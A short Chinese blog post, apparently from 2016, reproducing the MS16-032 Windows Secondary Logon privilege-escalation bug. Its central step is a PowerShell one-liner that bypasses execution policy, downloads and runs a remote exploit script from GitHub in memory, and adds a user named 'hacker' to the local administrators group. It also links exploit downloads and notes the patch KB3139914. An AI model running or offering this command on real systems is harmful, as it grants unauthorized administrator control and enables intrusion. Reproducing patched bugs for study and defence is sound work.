MS16-032 漏洞复现

exploit-db的详情:  https://www.exploit-db.com/exploits/39574/

Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege

 

0x01使用标准用户登陆win7,下图是当前登录用户abc的详细信息。

0x02直接执行命令进行提权,简单粗暴

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators hacker /add'"

0x03下面就是见证奇迹的时刻了

 

该漏洞危害十分严重,如图在2008server上测试

本地测试如图,被安全软件检测到。

微软官方在2016年3月8日发布了补丁KB3139914。

 

附上利用提取文件下载地址https://github.com/hexx0r/CVE-2016-0051

posted @ 2016-12-19 10:43  菜就多练forever  阅读(4095)  评论(0编辑  收藏  举报